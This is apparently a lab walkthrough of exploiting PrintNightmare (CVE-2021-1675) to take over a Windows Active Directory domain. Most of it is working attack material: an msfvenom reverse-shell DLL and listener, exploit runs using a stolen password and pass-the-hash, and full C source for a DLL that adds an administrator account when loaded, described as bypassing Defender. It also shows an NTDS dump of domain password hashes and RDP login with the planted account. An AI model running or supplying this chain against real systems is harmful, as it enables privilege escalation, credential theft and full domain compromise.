Exploit
Now try the same exploit on a vulnerable Windows Server 2019 host.
python3 CVE-2021-1675.py north.newyork.local/elena.lopez:'princesa1'@north.newyork.local '\\192.168.56.31\ATTACKERSHARE\nightmare.dll'
To exploit PrintNightmare, we first check whether the spooler service is active on the targets:
crackmapexec smb 192.168.56.10-23 -M spooler
rpcdump.py @192.168.56.10 | egrep 'MS-RPRN|MS-PAR'
sudo smbserver.py -smb2support "smb" /home/jefe/smb
msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=192.168.56.31 LPORT=4444 -o /home/jefe/smb/remote.dll
msfconsole
use multi/handler
set payload windows/x64/shell_reverse_tcp
set lhost 192.168.56.31
set lport 4444
run
python3 CVE-2021-1675.py maryland.local/teresa.perez@baltimore.maryland.local -hashes 00000000000000000000000000000000:4d737ec9ecf0b9955a161773cfed9611 '\\192.168.56.31\smb\pnightmare2.dll'
Let's change the payload to another piece of code (source: https://github.com/newsoft/adduser).
Good to know: after some failures the spooler service will be stopped by Defender, and there are no more exploits for you until someone restarts the server or the spooler service.
/*
* ADDUSER.C: creating a Windows user programmatically.
*/
#define UNICODE
#define _UNICODE
#include <windows.h>
#include <string.h>
#include <lmaccess.h>
#include <lmerr.h>
#include <tchar.h>
/*
 * Create a local user account and place it in the local "Administrators"
 * group, using the Net* (netapi32) and LookupAccountName (advapi32) APIs
 * against the local machine (server name NULL in every call below).
 *
 * Sequence: NetUserAdd (level 1) -> LookupAccountName to resolve the new
 * account's SID -> NetLocalGroupAddMembers (level 0, member given by SID).
 *
 * Returns: 0 on success; otherwise the NET_API_STATUS of the failing Net*
 * call, or GetLastError() if LookupAccountName fails. Each failure is also
 * printed to stdout. A failure after NetUserAdd succeeds leaves the account
 * created but not a member of the group.
 *
 * Review notes (defender's view): the user name and password are plaintext
 * literals in the binary, so they are recoverable from the DLL on disk;
 * local account creation and local-group membership changes are audited by
 * Windows (Security log events 4720 and 4732) when account-management
 * auditing is enabled.
 */
DWORD CreateAdminUserInternal(void)
{
NET_API_STATUS rc;
BOOL b;
DWORD dw;
USER_INFO_1 ud;
LOCALGROUP_MEMBERS_INFO_0 gd;
SID_NAME_USE snu;
DWORD cbSid = 256; // in/out for LookupAccountName: size of Sid in BYTES; 256 is well above SECURITY_MAX_SID_SIZE
BYTE Sid[256];
DWORD cbDomain = 256 / sizeof(TCHAR); // in/out for LookupAccountName: size of Domain in TCHARs, hence the division
TCHAR Domain[256];
// Create user (USER_INFO_1 = level 1; unset fields are zero from the memset)
memset(&ud, 0, sizeof(ud));
ud.usri1_name = _T("yournightmare"); // username (plaintext literal in the binary)
ud.usri1_password = _T("Jusbrowsing123!"); // password (plaintext literal in the binary)
ud.usri1_priv = USER_PRIV_USER; // cannot set USER_PRIV_ADMIN on creation; admin rights come from the group add below
ud.usri1_flags = UF_SCRIPT | UF_NORMAL_ACCOUNT; // must be set
ud.usri1_script_path = NULL;
rc = NetUserAdd(
NULL, // local server
1, // information level
(LPBYTE)&ud,
NULL // error value (parm_err not requested)
);
if (rc != NERR_Success) {
// NOTE(review): rc is a DWORD (unsigned long) but %d/%08x expect int; %lu/%08lx would match the argument type
_tprintf(_T("NetUserAdd FAIL %d 0x%08x\r\n"), rc, rc);
return rc;
}
// NOTE(review): the two trailing rc arguments are not consumed by this format string
_tprintf(_T("NetUserAdd OK\r\n"), rc, rc);
// Get user SID (needed because NetLocalGroupAddMembers level 0 takes a SID, not a name)
b = LookupAccountName(
NULL, // local server
ud.usri1_name, // account name
Sid, // SID
&cbSid, // SID size
Domain, // Domain
&cbDomain, // Domain size
&snu // SID_NAME_USE (enum)
);
if (!b) {
dw = GetLastError();
// NOTE(review): same DWORD vs %d/%08x mismatch as above
_tprintf(_T("LookupAccountName FAIL %d 0x%08x\r\n"), dw, dw);
return dw;
}
// Add user to "Administrators" local group (looked up by its display name)
memset(&gd, 0, sizeof(gd));
gd.lgrmi0_sid = (PSID)Sid;
rc = NetLocalGroupAddMembers(
NULL, // local server
_T("Administrators"),
0, // information level (LOCALGROUP_MEMBERS_INFO_0: SID only)
(LPBYTE)&gd,
1 // only one entry
);
if (rc != NERR_Success) {
// NOTE(review): same DWORD vs %d/%08x mismatch as above
_tprintf(_T("NetLocalGroupAddMembers FAIL %d 0x%08x\r\n"), rc, rc);
return rc;
}
return 0;
}
//
// DLL entry point.
//
// On DLL_PROCESS_ATTACH this calls CreateAdminUserInternal() directly, so the
// account is created as a side effect of the DLL being loaded, inside DllMain
// (i.e. under the loader lock) and before any export is called. The call's
// return value is ignored and DllMain always returns TRUE, so a failure never
// makes the load itself fail. After the call the case falls through to the
// shared break; nothing is done for the other reasons.
//
// NOTE(review): calling netapi32/advapi32 from DllMain is outside what the
// loader documents as safe (the guidance is to do only kernel32-level work
// in DllMain); whether this blocks or deadlocks depends on the host process.
//
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
CreateAdminUserInternal(); // status discarded; failures are only printed by the callee
/* fallthrough */
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
// RUNDLL32 entry point
//
// Exported with the rundll32 calling convention (HWND, HINSTANCE, LPSTR
// command line, int show state); all four parameters are ignored. Runs
// CreateAdminUserInternal() and discards its status, so a caller has no
// way to observe failure other than the callee's stdout output.
#ifdef __cplusplus
extern "C" {
#endif
__declspec(dllexport) void __stdcall CreateAdminUser(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
{
CreateAdminUserInternal(); // status discarded
}
#ifdef __cplusplus
}
#endif
// Command-line entry point.
//
// Running the build as an executable (rather than loading it as a DLL)
// performs the same account creation. The process exit code is the DWORD
// status from CreateAdminUserInternal() converted to int: 0 on success,
// otherwise the Win32/NET_API_STATUS error code.
int main()
{
return CreateAdminUserInternal();
}
With this payload we can bypass Defender and add our user as an administrator.
sudo apt-get install gcc-mingw-w64
wget https://raw.githubusercontent.com/newsoft/adduser/master/adduser.c
x86_64-w64-mingw32-gcc -shared -opnightmare2.dll adduser.c -lnetapi32
Relaunch the exploit:
python3 CVE-2021-1675.py maryland.local/teresa.perez@baltimore.maryland.local -hashes 00000000000000000000000000000000:4d737ec9ecf0b9955a161773cfed9611 '\\192.168.56.31\smb\yournightmare.dll'
crackmapexec smb baltimore.maryland.local -u yournightmare -p 'Jusbrowsing123!' --ntds
crackmapexec smb baltimore.maryland.local -u yournightmare -p 'Jusbrowsing123!' --ntds
SMB maryland.local 445 BALTIMORE [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BALTIMORE) (domain:maryland.local) (signing:True) (SMBv1:True)
SMB maryland.local 445 BALTIMORE [+] maryland.local\yournightmare:Jusbrowsing123! (Pwn3d!)
SMB maryland.local 445 BALTIMORE [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB maryland.local 445 BALTIMORE Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
SMB maryland.local 445 BALTIMORE Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB maryland.local 445 BALTIMORE krbtgt:502:aad3b435b51404eeaad3b435b51404ee:10f39f5a270977c56ac002b2c9cd660f:::
SMB maryland.local 445 BALTIMORE DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB maryland.local 445 BALTIMORE vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
SMB maryland.local 445 BALTIMORE carmelo.Anthony:1110:aad3b435b51404eeaad3b435b51404ee:e205909d5d55a6d75365f15defbf27fb:::
SMB maryland.local 445 BALTIMORE marisol.Pedrosa:1111:aad3b435b51404eeaad3b435b51404ee:fd208d19680104ddb8e3d90962c0334e:::
SMB maryland.local 445 BALTIMORE joaquin.Pereida:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
SMB maryland.local 445 BALTIMORE teresa.Perez:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
SMB maryland.local 445 BALTIMORE sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
SMB maryland.local 445 BALTIMORE pnightmare2:1115:aad3b435b51404eeaad3b435b51404ee:c103cafa49983dbcf3d8a1c951f46347:::
SMB maryland.local 445 BALTIMORE yournightmare:1116:aad3b435b51404eeaad3b435b51404ee:7b82840d460325f21d39ffdb471536f9:::
SMB maryland.local 445 BALTIMORE BALTIMORE$:1001:aad3b435b51404eeaad3b435b51404ee:0067621d2cb3ac05314b36ee408c7e51:::
SMB maryland.local 445 BALTIMORE SALISBURY$:1104:aad3b435b51404eeaad3b435b51404ee:da0edcfd9de34981b3bad4979882ec22:::
SMB maryland.local 445 BALTIMORE newyork$:1105:aad3b435b51404eeaad3b435b51404ee:3efc88864c2ab5cb43747ae949685db2:::
SMB maryland.local 445 BALTIMORE [+] Dumped 15 NTDS hashes to /home/jefe/.cme/logs/BALTIMORE_maryland.local_2023-03-08_223947.ntds of which 12 were added to the database
xfreerdp /u:yournightmare /p:Jusbrowsing123! /v:192.168.56.12 /size:80% /cert-ignore
After exploitation you will find your DLLs inside: C:\Windows\System32\spool\drivers\x64\3
and also inside: C:\Windows\System32\spool\drivers\x64\3\Old\{id}\
Don’t forget to clean up ;)